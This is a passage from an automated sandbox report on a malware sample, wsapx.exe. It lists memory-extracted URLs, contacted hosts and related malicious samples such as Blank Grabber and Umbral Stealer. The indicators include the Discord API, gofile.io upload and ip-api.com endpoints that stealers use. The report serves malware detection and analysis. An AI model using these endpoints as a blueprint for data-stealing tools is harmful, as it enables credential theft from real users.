                                                                                    https://github.com/python/cpython/issues/86361.wsapx.exe, 00000002.00000003.2181268132.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2182287470.000001C879EBE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180252331.000001C879D49000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180078817.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://httpbin.org/wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.ver)svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0swsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulewsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cacheswsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brwsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.youtube.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://allegro.pl/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sywsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://MD8.mozilla.org/1/mwsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.python.org/psf/license/wsapx.exe, 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                      high
                                                                                                                      http://ip-api.com/line/?fields=hostingrzrwsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.bbc.co.uk/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://g.live.com/odclientsettings/Prod1C:edb.log.23.drfalse
                                                                                                                            high
                                                                                                                            https://bugzilla.mowsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtwsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tools.ietf.org/html/rfc6125#section-6.4.3wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://google.com/mailwsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://packaging.python.org/specifications/entry-points/wsapx.exe, 00000002.00000002.2655489440.000001C87A180000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.python.org/psf/license/)wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pywsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/wsapx.exe, 00000002.00000002.2655982929.000001C87A5A8000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.iqiyi.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://foss.heptapod.net/pypy/pypy/-/issues/3539wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://google.com/wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://ocsp.sectigo.com0wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)wsapx.exe, 00000002.00000003.2181812826.000001C879A50000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2181812826.000001C879A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.python.org/download/releases/2.3/mro/.wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://discordapp.com/api/v9/users/wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcewsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specwsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datawsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://yahoo.com/wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://github.com/urllib3/urllib3/issues/251wsapx.exe, 00000002.00000003.2185307895.000001C87A029000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://account.bellmedia.cwsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6wsapx.exe, 00000002.00000003.2342123848.000001C879E0E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://login.microsoftonline.comwsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://cacerts.digicert.cowsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.ifeng.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningswsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.zhihu.com/wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://contoso.com/powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://oneget.orgXpowershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://api.gofile.io/getServerwsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngwsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://sectigo.com/CPS0wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icowsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://ocsp.thawte.com0wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                          ip-api.comUnited States
                                                                                                                                                                                                                          53334TUT-ASUSfalse
                                                                                                                                                                                                                          162.159.136.232
                                                                                                                                                                                                                          discord.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          127.0.0.1
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1574324
                                                                                                                                                                                                                          Start date and time:2024-12-13 08:36:23 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 13m 8s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:119
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:wsapx.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/56@4/3
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 40.126.53.21, 20.223.36.55, 13.107.246.63, 20.12.23.50, 20.103.156.88, 2.16.158.169, 4.175.87.197
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7720 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5328 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7664 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: wsapx.exe
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          02:37:20API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                          02:37:22API Interceptor127x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          02:37:24API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          208.95.112.1WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                                          bigfa.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                                          ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                                          162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                          • discord.com/administrator/index.php
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          discord.comWE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 162.159.136.232
                                                                                                                                                                                                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.138.232
